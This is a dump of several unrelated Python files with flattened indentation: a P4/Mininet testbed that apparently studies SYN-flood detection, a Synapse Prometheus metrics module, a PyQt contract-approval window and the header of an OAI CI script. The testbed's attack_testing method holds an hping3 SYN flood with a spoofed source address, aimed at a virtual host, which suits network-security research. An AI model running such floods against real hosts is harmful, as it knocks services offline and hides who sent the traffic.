# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Adapted by Robert MacDavid (macdavid@cs.princeton.edu) from scripts found in
# the p4app repository (https://github.com/p4lang/p4app)
#
# We encourage you to dissect this script to better understand the BMv2/Mininet
# environment used by the P4 tutorial.
#
import os, sys, json, subprocess, re, argparse
from time import sleep
import time
import threading
from p4_mininet import P4Switch, P4Host, P4HostV6, P4RuntimeSwitch
from mininet.net import Mininet
from mininet.topo import Topo
from mininet.link import TCLink
from mininet.cli import CLI
import p4runtime_lib.simple_controller
def configureP4Switch(**switch_args):
""" Helper class that is called by mininet to initialize
the virtual P4 switches. The purpose is to ensure each
switch's thrift server is using a unique port.
"""
if "sw_path" in switch_args and 'grpc' in switch_args['sw_path']:
        # If grpc appears in the BMv2 switch target, we assume it will start P4Runtime
class ConfiguredP4RuntimeSwitch(P4RuntimeSwitch):
def __init__(self, *opts, **kwargs):
kwargs.update(switch_args)
P4RuntimeSwitch.__init__(self, *opts, **kwargs)
def describe(self):
print '====================================='
print 'Switch Device ID: %s' % str(self.device_id)
print 'Switch CPU port: %s' % str(self.cpu_port)
print "%s -> gRPC port: %d" % (self.name, self.grpc_port)
return ConfiguredP4RuntimeSwitch
else:
class ConfiguredP4Switch(P4Switch):
next_thrift_port = 9090
def __init__(self, *opts, **kwargs):
kwargs.update(switch_args)
kwargs['thrift_port'] = ConfiguredP4Switch.next_thrift_port
ConfiguredP4Switch.next_thrift_port += 1
P4Switch.__init__(self, *opts, **kwargs)
def describe(self):
print "%s -> Thrift port: %d" % (self.name, self.thrift_port)
return ConfiguredP4Switch
class ExerciseTopo(Topo):
""" The mininet topology class for the P4 tutorial exercises.
A custom class is used because the exercises make a few topology
assumptions, mostly about the IP and MAC addresses.
"""
def __init__(self, hosts, switches, links, log_dir, host_mode, **opts):
Topo.__init__(self, **opts)
host_links = []
switch_links = []
self.sw_port_mapping = {}
for link in links:
if link['node1'][0] == 'h':
host_links.append(link)
else:
switch_links.append(link)
# link_sort_key = lambda x: x['node1'] + x['node2']
# # Links must be added in a sorted order so bmv2 port numbers are predictable
# host_links.sort(key=link_sort_key)
# switch_links.sort(key=link_sort_key)
for sw in switches:
self.addSwitch(sw, log_file="%s/%s.log" %(log_dir, sw))
for host in hosts:
print(host)
        if host_mode == 4:
host_index = 0
for link in host_links:
host_name = link['node1']
host_sw = link['node2']
host_num = int(host_name[1:])
sw_num = int(host_sw[1:])
# host_ip = "10.0.%d.%d" % (sw_num, host_num)
host_ip = hosts[host_index][1]
host_mac = '00:00:00:00:%02x:%02x' % (sw_num, host_num)
                # Host IPs are added as /32 here, so all traffic is forced
                # through the routes installed later in program_hosts().
self.addHost(host_name, ip=host_ip+'/32', mac=host_mac)
self.addLink(host_name, host_sw,
delay=link['latency'], bw=link['bandwidth'],
addr1=host_mac, addr2=host_mac)
self.addSwitchPort(host_sw, host_name)
host_index = host_index+1
for link in switch_links:
self.addLink(link['node1'], link['node2'],
delay=link['latency'], bw=link['bandwidth'])
self.addSwitchPort(link['node1'], link['node2'])
self.addSwitchPort(link['node2'], link['node1'])
self.printPortMapping()
def addSwitchPort(self, sw, node2):
if sw not in self.sw_port_mapping:
self.sw_port_mapping[sw] = []
portno = len(self.sw_port_mapping[sw])+1
self.sw_port_mapping[sw].append((portno, node2))
def printPortMapping(self):
print "Switch port mapping:"
for sw in sorted(self.sw_port_mapping.keys()):
print "%s: " % sw,
for portno, node2 in self.sw_port_mapping[sw]:
print "%d:%s\t" % (portno, node2),
print
class ExerciseRunner:
"""
Attributes:
log_dir : string // directory for mininet log files
pcap_dir : string // directory for mininet switch pcap files
quiet : bool // determines if we print logger messages
hosts : list<string> // list of mininet host names
switches : dict<string, dict> // mininet host names and their associated properties
links : list<dict> // list of mininet link properties
switch_json : string // json of the compiled p4 example
bmv2_exe : string // name or path of the p4 switch binary
topo : Topo object // The mininet topology instance
net : Mininet object // The mininet instance
host_mode: integer // IPv4/IPv6 specification
"""
def logger(self, *items):
if not self.quiet:
print(' '.join(items))
def formatLatency(self, l):
""" Helper method for parsing link latencies from the topology json. """
if isinstance(l, (str, unicode)):
return l
else:
return str(l) + "ms"
def __init__(self, topo_file, log_dir, pcap_dir,
switch_json, bmv2_exe='simple_switch', quiet=False, host_mode=4):
""" Initializes some attributes and reads the topology json. Does not
actually run the exercise. Use run_exercise() for that.
Arguments:
topo_file : string // A json file which describes the exercise's
mininet topology.
log_dir : string // Path to a directory for storing exercise logs
pcap_dir : string // Ditto, but for mininet switch pcap files
switch_json : string // Path to a compiled p4 json for bmv2
bmv2_exe : string // Path to the p4 behavioral binary
quiet : bool // Enable/disable script debug messages
"""
self.quiet = quiet
self.logger('Reading topology file.')
with open(topo_file, 'r') as f:
topo = json.load(f)
self.hosts = topo['hosts']
self.switches = topo['switches']
self.links = self.parse_links(topo['links'])
# Ensure all the needed directories exist and are directories
for dir_name in [log_dir, pcap_dir]:
if not os.path.isdir(dir_name):
if os.path.exists(dir_name):
raise Exception("'%s' exists and is not a directory!" % dir_name)
os.mkdir(dir_name)
self.log_dir = log_dir
self.pcap_dir = pcap_dir
self.switch_json = switch_json
self.bmv2_exe = bmv2_exe
# IPv4/6
self.host_mode = host_mode
def run_exercise(self):
""" Sets up the mininet instance, programs the switches,
and starts the mininet CLI. This is the main method to run after
initializing the object.
"""
# Initialize mininet with the topology specified by the config
self.create_network()
self.net.start()
sleep(1)
# some programming that must happen after the net has started
self.program_hosts()
self.program_switches()
# wait for that to finish. Not sure how to do this better
print "please open controller"
s1 = self.net.get(self.topo.switches()[0])
s22 = self.net.get(self.topo.switches()[21])
s23 = self.net.get(self.topo.switches()[22])
s2 = self.net.get(self.topo.switches()[1])
s4 = self.net.get(self.topo.switches()[3])
s5 = self.net.get(self.topo.switches()[4])
sleep(15)
s1.cmdPrint("python sniffer.py s1 1 >sniffer/s1.txt &")
s22.cmdPrint("python sniffer.py s22 1 >sniffer/r1.txt &")
s23.cmdPrint("python sniffer.py s23 1 >sniffer/r2.txt &")
s2.cmdPrint("python sniffer.py s2 1 >sniffer/s2.txt &")
s4.cmdPrint("python sniffer.py s4 2 >sniffer/s3.txt &")
s5.cmdPrint("python sniffer.py s5 2 >sniffer/s4.txt &")
self.start_time=time.time()
normal = threading.Thread(target=self.normal_testing)
normal.start()
# a2 = threading.Thread(target=self.attack_testing)
# a2.start()
# self.do_net_cli()
# stop right after the CLI is exited
normal.join()
# a2.join()
        while True:
            if time.time() - self.start_time > 200:
                self.net.stop()
                break
            sleep(1)  # avoid a busy-wait while the experiment runs
def parse_links(self, unparsed_links):
""" Given a list of links descriptions of the form [node1, node2, latency, bandwidth]
with the latency and bandwidth being optional, parses these descriptions
into dictionaries and store them as self.links
"""
links = []
for link in unparsed_links:
# make sure each link's endpoints are ordered alphabetically
            s, t = link[0], link[1]
if s > t:
s,t = t,s
link_dict = {'node1':s,
'node2':t,
'latency':'0ms',
'bandwidth':None
}
if len(link) > 2:
link_dict['latency'] = self.formatLatency(link[2])
if len(link) > 3:
link_dict['bandwidth'] = link[3]
if link_dict['node1'][0] == 'h':
assert link_dict['node2'][0] == 's', 'Hosts should be connected to switches, not ' + str(link_dict['node2'])
links.append(link_dict)
return links
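    # Illustrative (not from the topology json): a raw link entry
    # ['h1', 's1', '5ms', 10] parses to {'node1': 'h1', 'node2': 's1',
    # 'latency': '5ms', 'bandwidth': 10}.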
def create_network(self):
""" Create the mininet network object, and store it as self.net.
Side effects:
- Mininet topology instance stored as self.topo
- Mininet instance stored as self.net
"""
self.logger("Building mininet topology.")
self.topo = ExerciseTopo(self.hosts, self.switches.keys(), self.links, self.log_dir,self.host_mode)
switchClass = configureP4Switch(
sw_path=self.bmv2_exe,
json_path=self.switch_json,
log_console=True,
pcap_dump=self.pcap_dir)
        if self.host_mode == 4:
self.net = Mininet(topo = self.topo,
link = TCLink,
host = P4Host,
switch = switchClass,
controller = None)
        if self.host_mode == 6:
self.net = Mininet(topo = self.topo,
link = TCLink,
host = P4HostV6,
switch = switchClass,
controller = None)
def program_switch_p4runtime(self, sw_name, sw_dict):
""" This method will use P4Runtime to program the switch using the
content of the runtime JSON file as input.
"""
sw_obj = self.net.get(sw_name)
grpc_port = sw_obj.grpc_port
device_id = sw_obj.device_id
runtime_json = sw_dict['runtime_json']
self.logger('Configuring switch %s using P4Runtime with file %s' % (sw_name, runtime_json))
with open(runtime_json, 'r') as sw_conf_file:
outfile = '%s/%s-p4runtime-requests.txt' %(self.log_dir, sw_name)
p4runtime_lib.simple_controller.program_switch(
addr='127.0.0.1:%d' % grpc_port,
device_id=device_id,
sw_conf_file=sw_conf_file,
workdir=os.getcwd(),
proto_dump_fpath=outfile)
def program_switch_cli(self, sw_name, sw_dict):
""" This method will start up the CLI and use the contents of the
command files as input.
"""
cli = 'simple_switch_CLI'
# get the port for this particular switch's thrift server
sw_obj = self.net.get(sw_name)
thrift_port = sw_obj.thrift_port
cli_input_commands = sw_dict['cli_input']
self.logger('Configuring switch %s with file %s' % (sw_name, cli_input_commands))
with open(cli_input_commands, 'r') as fin:
cli_outfile = '%s/%s_cli_output.log'%(self.log_dir, sw_name)
with open(cli_outfile, 'w') as fout:
subprocess.Popen([cli, '--thrift-port', str(thrift_port)],
stdin=fin, stdout=fout)
def program_switches(self):
""" This method will program each switch using the BMv2 CLI and/or
P4Runtime, depending if any command or runtime JSON files were
provided for the switches.
"""
for sw_name, sw_dict in self.switches.iteritems():
if 'cli_input' in sw_dict:
self.program_switch_cli(sw_name, sw_dict)
if 'runtime_json' in sw_dict:
self.program_switch_p4runtime(sw_name, sw_dict)
def program_hosts(self):
""" Adds static ARP entries and default routes to each mininet host.
Assumes:
- A mininet instance is stored as self.net and self.net.start() has
been called.
"""
for host_name in self.topo.hosts():
h = self.net.get(host_name)
h_iface = h.intfs.values()[0]
link = h_iface.link
sw_iface = link.intf1 if link.intf1 != h_iface else link.intf2
# phony IP to lie to the host about
host_id = int(host_name[1:])
sw_ip = '10.0.%d.254' % host_id
            if self.host_mode == 6:
sw_v6_ip = '1000::%d:1' % host_id
# Ensure each host's interface name is unique, or else
# mininet cannot shutdown gracefully
h.defaultIntf().rename('%s-eth0' % host_name)
# static arp entries and default routes
h.cmd('arp -i %s -s %s %s' % (h_iface.name, sw_ip, sw_iface.mac))
h.cmd('ethtool --offload %s rx off tx off' % h_iface.name)
h.cmd('ip route add %s dev %s' % (sw_ip, h_iface.name))
            if self.host_mode == 6:
h.cmd('ip -6 route add %s dev %s' % (sw_v6_ip, h_iface.name))
h.setDefaultRoute("via %s" % sw_ip)
#if self.host_mode is 6:
# h.setDefaultRoute("via %s" % sw_v6_ip)
# syn test setting
server = self.net.get(self.topo.hosts()[0])
server.cmd("cd ./file")
server.cmd("python -m SimpleHTTPServer 80 &")
def normal_testing(self):
h = self.net.get(self.topo.hosts()[4])
while True:
# for host_name in self.topo.hosts()[1:10]:
if time.time()-self.start_time >= 200:
print "normal_stop"
return
h.cmd("curl 10.0.1.1 &")
sleep(20)
# if time.time()-self.start_time >= 150:
# print "normal_stop"
# return
# h = self.net.get(self.topo.hosts()[14])
# h.cmd("curl 10.0.1.1 &")
# sleep(0.5)
def attack_testing(self):
# sleep(60)
h = self.net.get(self.topo.hosts()[1])
# h2 = self.net.get(self.topo.hosts()[1])
# h3 = self.net.get(self.topo.hosts()[2])
# h4 = self.net.get(self.topo.hosts()[3])
# h5 = self.net.get(self.topo.hosts()[4])
while True:
if time.time()-self.start_time > 200:
print "attack_stop"
return
h.cmd("hping3 10.0.1.1 -S -p 80 -i u40000 -a 11.0.0.1")
# h2.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.0."+str(index))
# h3.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.1."+str(index))
# h4.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.0.2."+str(index))
# h5.cmd("hping3 10.0.1.1 -S -p 80 -c 5 -a 11.1.0."+str(index))
def do_net_cli(self):
""" Starts up the mininet CLI and prints some helpful output.
Assumes:
- A mininet instance is stored as self.net and self.net.start() has
been called.
"""
for s in self.net.switches:
s.describe()
for h in self.net.hosts:
h.describe()
self.logger("Starting mininet CLI")
# Generate a message that will be printed by the Mininet CLI to make
# interacting with the simple switch a little easier.
print('')
print('======================================================================')
print('Welcome to the BMV2 Mininet CLI!')
print('======================================================================')
print('Your P4 program is installed into the BMV2 software switch')
print('and your initial runtime configuration is loaded. You can interact')
print('with the network using the mininet CLI below.')
print('')
if self.switch_json:
print('To inspect or change the switch configuration, connect to')
print('its CLI from your host operating system using this command:')
print(' simple_switch_CLI --thrift-port <switch thrift port>')
print('')
print('To view a switch log, run this command from your host OS:')
print(' tail -f %s/<switchname>.log' % self.log_dir)
print('')
print('To view the switch output pcap, check the pcap files in %s:' % self.pcap_dir)
print(' for example run: sudo tcpdump -xxx -r s1-eth1.pcap')
print('')
if 'grpc' in self.bmv2_exe:
print('To view the P4Runtime requests sent to the switch, check the')
print('corresponding txt file in %s:' % self.log_dir)
print(' for example run: cat %s/s1-p4runtime-requests.txt' % self.log_dir)
print('')
CLI(self.net)
def get_args():
cwd = os.getcwd()
default_logs = os.path.join(cwd, 'logs')
default_pcaps = os.path.join(cwd, 'pcaps')
parser = argparse.ArgumentParser()
parser.add_argument('-q', '--quiet', help='Suppress log messages.',
action='store_true', required=False, default=False)
parser.add_argument('-t', '--topo', help='Path to topology json',
type=str, required=False, default='./topology.json')
parser.add_argument('-l', '--log-dir', type=str, required=False, default=default_logs)
parser.add_argument('-p', '--pcap-dir', type=str, required=False, default=default_pcaps)
parser.add_argument('-j', '--switch_json', type=str, required=False)
parser.add_argument('-b', '--behavioral-exe', help='Path to behavioral executable',
type=str, required=False, default='simple_switch')
parser.add_argument('-m', '--host_mode', help='Mode of Host, IPv4(4) or IPv6(6).',
type=int, required=False, default=4)
return parser.parse_args()
if __name__ == '__main__':
# from mininet.log import setLogLevel
# setLogLevel("info")
args = get_args()
exercise = ExerciseRunner(args.topo, args.log_dir, args.pcap_dir,
args.switch_json, args.behavioral_exe, args.quiet,args.host_mode)
exercise.run_exercise()
|
_exposition.py
|
# Copyright 2015-2019 Prometheus Python Client Developers
# Copyright 2019 Matrix.org Foundation C.I.C.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This code is based on `prometheus_client/exposition.py` from version 0.7.1.
Due to the renaming of metrics in prometheus_client 0.4.0, this customised
vendoring of the code will emit both the old versions that Synapse dashboards
expect, and the newer "best practice" version of the up-to-date official client.
"""
import math
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
from typing import Dict, List
from urllib.parse import parse_qs, urlparse
from prometheus_client import REGISTRY
from twisted.web.resource import Resource
from synapse.util import caches
CONTENT_TYPE_LATEST = str("text/plain; version=0.0.4; charset=utf-8")
INF = float("inf")
MINUS_INF = float("-inf")
def floatToGoString(d):
d = float(d)
if d == INF:
return "+Inf"
elif d == MINUS_INF:
return "-Inf"
elif math.isnan(d):
return "NaN"
else:
s = repr(d)
dot = s.find(".")
# Go switches to exponents sooner than Python.
# We only need to care about positive values for le/quantile.
if d > 0 and dot > 6:
mantissa = "{0}.{1}{2}".format(s[0], s[1:dot], s[dot + 1 :]).rstrip("0.")
return "{0}e+0{1}".format(mantissa, dot - 1)
return s
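# Illustrative sanity checks for the Go-style formatting above (a sketch,
# not part of the vendored code):
#   floatToGoString(float("inf")) -> "+Inf"
#   floatToGoString(float("nan")) -> "NaN"
#   floatToGoString(0.5)          -> "0.5"
#   floatToGoString(1234567.0)    -> "1.234567e+06"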
def sample_line(line, name):
if line.labels:
labelstr = "{{{0}}}".format(
",".join(
[
'{0}="{1}"'.format(
k,
v.replace("\\", r"\\").replace("\n", r"\n").replace('"', r"\""),
)
for k, v in sorted(line.labels.items())
]
)
)
else:
labelstr = ""
timestamp = ""
if line.timestamp is not None:
# Convert to milliseconds.
timestamp = " {0:d}".format(int(float(line.timestamp) * 1000))
return "{0}{1} {2}{3}\n".format(
name, labelstr, floatToGoString(line.value), timestamp
)
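# Rendering sketch (hypothetical sample values): a prometheus_client Sample
# with name "http_requests", labels {"code": "200"}, value 3 and
# timestamp 1.5 would render as:
#   http_requests{code="200"} 3.0 1500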
def generate_latest(registry, emit_help=False):
# Trigger the cache metrics to be rescraped, which updates the common
# metrics but does not produce metrics itself
for collector in caches.collectors_by_name.values():
collector.collect()
output = []
for metric in registry.collect():
if not metric.samples:
# No samples, don't bother.
continue
mname = metric.name
mnewname = metric.name
mtype = metric.type
# OpenMetrics -> Prometheus
if mtype == "counter":
mnewname = mnewname + "_total"
elif mtype == "info":
mtype = "gauge"
mnewname = mnewname + "_info"
elif mtype == "stateset":
mtype = "gauge"
elif mtype == "gaugehistogram":
mtype = "histogram"
elif mtype == "unknown":
mtype = "untyped"
# Output in the old format for compatibility.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mname, mtype))
om_samples = {} # type: Dict[str, List[str]]
for s in metric.samples:
for suffix in ["_created", "_gsum", "_gcount"]:
if s.name == metric.name + suffix:
# OpenMetrics specific sample, put in a gauge at the end.
# (these come from gaugehistograms which don't get renamed,
# so no need to faff with mnewname)
om_samples.setdefault(suffix, []).append(sample_line(s, s.name))
break
else:
newname = s.name.replace(mnewname, mname)
if ":" in newname and newname.endswith("_total"):
newname = newname[: -len("_total")]
output.append(sample_line(s, newname))
for suffix, lines in sorted(om_samples.items()):
if emit_help:
output.append(
"# HELP {0}{1} {2}\n".format(
metric.name,
suffix,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0}{1} gauge\n".format(metric.name, suffix))
output.extend(lines)
# Get rid of the weird colon things while we're at it
if mtype == "counter":
mnewname = mnewname.replace(":total", "")
mnewname = mnewname.replace(":", "_")
if mname == mnewname:
continue
# Also output in the new format, if it's different.
if emit_help:
output.append(
"# HELP {0} {1}\n".format(
mnewname,
metric.documentation.replace("\\", r"\\").replace("\n", r"\n"),
)
)
output.append("# TYPE {0} {1}\n".format(mnewname, mtype))
for s in metric.samples:
# Get rid of the OpenMetrics specific samples (we should already have
# dealt with them above anyway.)
for suffix in ["_created", "_gsum", "_gcount"]:
if s.name == metric.name + suffix:
break
else:
output.append(
sample_line(s, s.name.replace(":total", "").replace(":", "_"))
)
return "".join(output).encode("utf-8")
class MetricsHandler(BaseHTTPRequestHandler):
"""HTTP handler that gives metrics from ``REGISTRY``."""
registry = REGISTRY
def do_GET(self):
registry = self.registry
params = parse_qs(urlparse(self.path).query)
if "help" in params:
emit_help = True
else:
emit_help = False
try:
output = generate_latest(registry, emit_help=emit_help)
except Exception:
self.send_error(500, "error generating metric output")
raise
self.send_response(200)
self.send_header("Content-Type", CONTENT_TYPE_LATEST)
self.send_header("Content-Length", str(len(output)))
self.end_headers()
self.wfile.write(output)
def log_message(self, format, *args):
"""Log nothing."""
@classmethod
def factory(cls, registry):
"""Returns a dynamic MetricsHandler class tied
to the passed registry.
"""
# This implementation relies on MetricsHandler.registry
# (defined above and defaulted to REGISTRY).
# As we have unicode_literals, we need to create a str()
# object for type().
cls_name = str(cls.__name__)
MyMetricsHandler = type(cls_name, (cls, object), {"registry": registry})
return MyMetricsHandler
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
# Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
# same as Python 3.7's ``ThreadingHTTPServer``.
daemon_threads = True
def start_http_server(port, addr="", registry=REGISTRY):
"""Starts an HTTP server for prometheus metrics as a daemon thread"""
CustomMetricsHandler = MetricsHandler.factory(registry)
httpd = _ThreadingSimpleServer((addr, port), CustomMetricsHandler)
t = threading.Thread(target=httpd.serve_forever)
t.daemon = True
t.start()
class MetricsResource(Resource):
"""
Twisted ``Resource`` that serves prometheus metrics.
"""
isLeaf = True
def __init__(self, registry=REGISTRY):
self.registry = registry
def render_GET(self, request):
request.setHeader(b"Content-Type", CONTENT_TYPE_LATEST.encode("ascii"))
response = generate_latest(self.registry)
request.setHeader(b"Content-Length", str(len(response)))
return response
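# Usage sketch (not part of the vendored module), assuming the default
# REGISTRY and a Twisted reactor to run:
#
#   from twisted.web.server import Site
#   from twisted.internet import reactor
#
#   reactor.listenTCP(9100, Site(MetricsResource()))
#   reactor.run()  # metrics are then served on http://localhost:9100/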
|
LCEOWindow.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5 import QtWidgets, QtGui
from PyQt5.QtWidgets import *
from GUI.CEOWindow import Design_CEOWindow
import sys
from Controllers import CEOControl
import win32com.client
import threading
import random
class CEOWindow(Design_CEOWindow):
def __init__(self,ID, parent=None):
super().__init__(parent)
self.__ID = ID
self.__control = CEOControl(ID)
self.speaker = win32com.client.Dispatch("SAPI.SpVoice")
self.btnAllShop.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("全部店铺")).start())  # speaks "All shops"
self.btnMyShop.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("审核合同")).start())  # speaks "Audit contracts"
self.btnInf.clicked.connect(lambda: threading.Thread(target=lambda: self.speaker.Speak("我的信息")).start())  # speaks "My information"
self.__contracts = self.__control.get_all_contracts()
self.__receipts = self.__control.get_all_receipts()
self.__receivables = self.__control.get_all_receivable()
self.pushButtonShop_01.clicked.connect(lambda :self.set_information(1))
self.pushButtonShop_02.clicked.connect(lambda :self.set_information(2))
self.pushButtonShop_03.clicked.connect(lambda :self.set_information(3))
self.pushButtonShop_04.clicked.connect(lambda :self.set_information(4))
self.pushButtonShop_05.clicked.connect(lambda :self.set_information(5))
self.pushButtonShop_06.clicked.connect(lambda :self.set_information(6))
self.pushButtonShop_07.clicked.connect(lambda :self.set_information(7))
self.pushButtonShop_08.clicked.connect(lambda :self.set_information(8))
self.pushButtonShop_09.clicked.connect(lambda :self.set_information(9))
self.pushButtonShop_10.clicked.connect(lambda :self.set_information(10))
self.pushButtonShop_11.clicked.connect(lambda :self.set_information(11))
self.pushButtonShop_12.clicked.connect(lambda :self.set_information(12))
self.show_combo()
self.auditConfirmation.clicked.connect(self.confirm_contract)
self.signatureConfirmation.clicked.connect(self.sign_contract_)
self.residualAudit.currentTextChanged.connect(self.set_confirm_contract)
self.quantityAudited.currentTextChanged.connect(self.set_affirm_contract)
def set_confirm_contract(self):
for contract in self.__contracts:
if self.residualAudit.currentText() == str(contract["number"]):
self.contractContent.setText(contract["contractInfo"])
self.shopNun.setText(str(contract["number"]))
# self.userTel.setText(random.randint(12031823712,19023912381))
self.rentTime.setText(str(contract["contractYear"]))
return None
def set_affirm_contract(self):
for contract in self.__contracts:
if self.quantityAudited.currentText() == str(contract["number"]):
self.contractContent.setText(contract["contractInfo"])
self.shopNun.setText(str(contract["number"]))
# self.userTel.setText(str(random.randint(12031823712,19023912381)))
self.rentTime.setText(str(contract["contractYear"]))
return None
def show_combo(self):
"""
Populate the contract drop-down menus.
:return:
"""
confirmNum = 0
signNum = 0
for contract in self.__contracts:
if contract["contractCeoAffirm"] ==0 and contract["contractCeoSign"] ==0:
self.residualAudit.addItem(str(contract["number"]))
confirmNum += 1
if contract["contractCeoAffirm"] ==1 and contract["contractCeoSign"] ==0:
# self.quantityAudited.addItem("asas")
self.quantityAudited.addItem(str(contract["number"]))
signNum += 1
self.residualAuditNum.setText(str(confirmNum))
self.quantityAuditedNum.setText(str(signNum))
return None
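# Contract lifecycle sketch inferred from the flags above:
#   contractCeoAffirm=0, contractCeoSign=0 -> awaiting audit (residualAudit combo)
#   contractCeoAffirm=1, contractCeoSign=0 -> awaiting signature (quantityAudited combo)
#   contractCeoAffirm=1, contractCeoSign=1 -> fully executed (listed in neither)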
def set_information_confirm(self):
"""
Update the right-hand panel to match the selected application entry.
:return:
"""
currentContract = None
for contract in self.__contracts:
if str(contract["number"]) == self.residualAudit.currentText():
currentContract = contract
break
self.shopNun.setText(str(currentContract["number"]))
# self.userTel.setText(str(currentContract["telenumber"]))
self.rentTime.setText(str(currentContract["contractYear"]))
self.contractContent.setText(str(currentContract["contractInfo"]))
# self.rentReason.setText(str(currentContract["rentUsage"]))
return None
def set_information(self,number):
currentReceipt = None
currentContract = None
currentReceivable = None
for receipt in self.__receipts:
if receipt["number"] == int(number):
currentReceipt = receipt
break
for contract in self.__contracts:
if contract["number"] == int(number):
currentContract = contract
break
for receivable in self.__receivables:
if receivable["number"] == int(number):
currentReceivable = receivable
break
self.owePropertyFee.setCheckable(True)
self.oweElectricFee.setCheckable(True)
self.oweGuaranteePaid.setCheckable(True)
self.oweWaterFee.setCheckable(True)
self.ceoConfirm.setCheckable(True)
self.userSignature.setCheckable(True)
self.ceoSingature.setCheckable(True)
if currentReceipt is not None and currentContract is not None and currentReceivable is not None:
# Shop information
self.propertyFee.setText(str(currentReceipt["receiptPropCharge"]))
self.guaranteePaid.setText(str(currentReceipt["receiptGuarCharge"]))
self.waterFeePaid.setText(str(currentReceipt["receiptWaterCharge"]))
self.electricFeePaid.setText(str(currentReceipt["receiptEleCharge"]))
# Payment status
if currentReceivable["receivablePropCharge"] > currentReceipt["receiptPropCharge"]:
self.owePropertyFee.setChecked(True)
else:
self.owePropertyFee.setChecked(False)
if currentReceivable["receivableEleCharge"] > currentReceipt["receiptEleCharge"]:
self.oweElectricFee.setChecked(True)
else:
self.oweElectricFee.setChecked(False)
if currentReceivable["receivableGuarCharge"] > currentReceipt["receiptGuarCharge"]:
self.oweGuaranteePaid.setChecked(True)
else:
self.oweGuaranteePaid.setChecked(False)
if currentReceivable["receivableWaterCharge"] > currentReceipt["receiptWaterCharge"]:
self.oweWaterFee.setChecked(True)
else:
self.oweWaterFee.setChecked(False)
# Contract information
self.shopNumberContract.setText(str(number))
self.RentStateContract.setText(str(currentContract["contractStatus"]))
self.rentTimeContract.setText(str(currentContract["contractYear"]))
print("**************currentContract[contractCeoAffirm]***************")
print(currentContract["contractCeoAffirm"])
print(bool(currentContract["contractCeoAffirm"]))
self.ceoConfirm.setChecked(bool(currentContract["contractCeoAffirm"]))
print("**************currentContract[contractProprietorSign]***************")
print(currentContract["contractProprietorSign"])
self.userSignature.setChecked(bool(currentContract["contractProprietorSign"]))
self.ceoSingature.setChecked(bool(currentContract["contractCeoSign"]))
self.contractInfomation.setText(str(currentContract["contractInfo"]))
else:
# Shop information
self.shopNumberText.setText(str(number))
self.propertyFeePaid.setText("")
self.guaranteePaid.setText("")
self.waterFeePaid.setText("")
self.electricFeePaid.setText("")
self.rentStateText.setText("")
# Payment status
self.owePropertyFee.setChecked(False)
self.oweElectricFee.setChecked(False)
self.oweGuaranteePaid.setChecked(False)
self.oweWaterFee.setChecked(False)
# Contract information
self.shopNumberContract.setText(str(number))
self.RentStateContract.setText("")
self.rentTimeContract.setText("")
self.ceoConfirm.setChecked(False)
self.userSignature.setChecked(False)
self.ceoSingature.setChecked(False)
self.contractInfomation.setText("")
# self.owePropertyFee.setCheckable(False)
# self.oweElectricFee.setCheckable(False)
# self.oweGuaranteePaid.setCheckable(False)
# self.oweWaterFee.setCheckable(False)
# self.ceoConfirm.setCheckable(False)
# self.userSignature.setCheckable(False)
# self.ceoSingature.setCheckable(False)
def confirm_contract(self):
"""
Confirm the contract.
:return:
"""
if self.contractConfirm.isChecked():
for contract in self.__contracts:
if str(contract["number"]) == str(self.shopNun.text()):
self.__control.set_contract_ceoaffirm_by_id(contract["ID"],1)
break
QMessageBox.information(self,
"消息",  # "Message"
"确认成功")  # "Confirmed successfully"
return None
def sign_contract_(self):
"""
Sign the contract.
:return:
"""
if self.ceoSignature.text() !="":
for contract in self.__contracts:
if str(contract["number"]) == str(self.shopNun.text()):
self.__control.set_contract_ceosign_by_id(contract["ID"],1)
QMessageBox.information(self,
"消息",  # "Message"
"签字成功")  # "Signed successfully"
return None
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
MainWindow = CEOWindow("sa")
MainWindow.show()
sys.exit(app.exec_())
|
main.py
|
# /*
# * Licensed to the OpenAirInterface (OAI) Software Alliance under one or more
# * contributor license agreements. See the NOTICE file distributed with
# * this work for additional information regarding copyright ownership.
# * The OpenAirInterface Software Alliance licenses this file to You under
# * the OAI Public License, Version 1.1 (the "License"); you may not use this file
# * except in compliance with the License.
# * You may obtain a copy of the License at
# *
# * http://www.openairinterface.org/?page_id=698
# *
# * Unless required by applicable law or agreed to in writing, software
# * distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
# *-------------------------------------------------------------------------------
# * For more information about the OpenAirInterface (OAI) Software Alliance:
# * contact@openairinterface.org
# */
#---------------------------------------------------------------------
# Python for CI of OAI-eNB + COTS-UE
#
# Required Python Version
# Python 3.x
#
# Required Python Package
# pexpect
#---------------------------------------------------------------------
#-----------------------------------------------------------
# Version
#-----------------------------------------------------------
Version = '0.1'
#-----------------------------------------------------------
# Constants
#-----------------------------------------------------------
ALL_PROCESSES_OK = 0
